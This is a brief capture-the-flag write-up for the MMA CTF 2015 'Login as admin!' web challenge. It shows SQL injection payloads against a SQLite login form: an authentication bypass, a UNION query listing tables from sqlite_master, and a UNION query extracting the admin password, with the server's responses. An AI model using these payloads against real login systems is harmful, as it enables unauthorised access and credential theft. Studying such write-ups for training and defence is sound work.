Login as admin!
Problem
Login as admin. And get the flag! The flag is the password of admin.
http://arrive.chal.mmactf.link/login.cgi
You can use test:test.
Flag
# | Your Score | Score | Teams | |
---|---|---|---|---|
1 | 30 | 30 | 318 |
Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]
This Problem is sql injection,then this is sqlite.
Let's exploit!
First I send query simply
POST DATA : username=admin' --&password=1
Congratulations!!
You are admin user.
The flag is your password!
logout
oh... flag is admin's password.
therefore i find table name.
POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1
Table name is 'user'.
so, i inject username with union command
POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1
You are MMA{cats_alice_band} user.
Good!
Flag is MMA{cats_alice_band}
Actually this problem is not filtering.
so, you can used blind sql injection.
Author : shpik (http://shpik.tistory.com)
'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글
[Crypto] Twin Prime - 50pts (0) | 2016.09.05 |
---|---|
[Web] Global Page - 50pts (0) | 2016.09.05 |
[Web] Get the admin password! - 100pts (0) | 2016.09.05 |
[Web] Mortal Magi Agents - 300pts (0) | 2015.09.09 |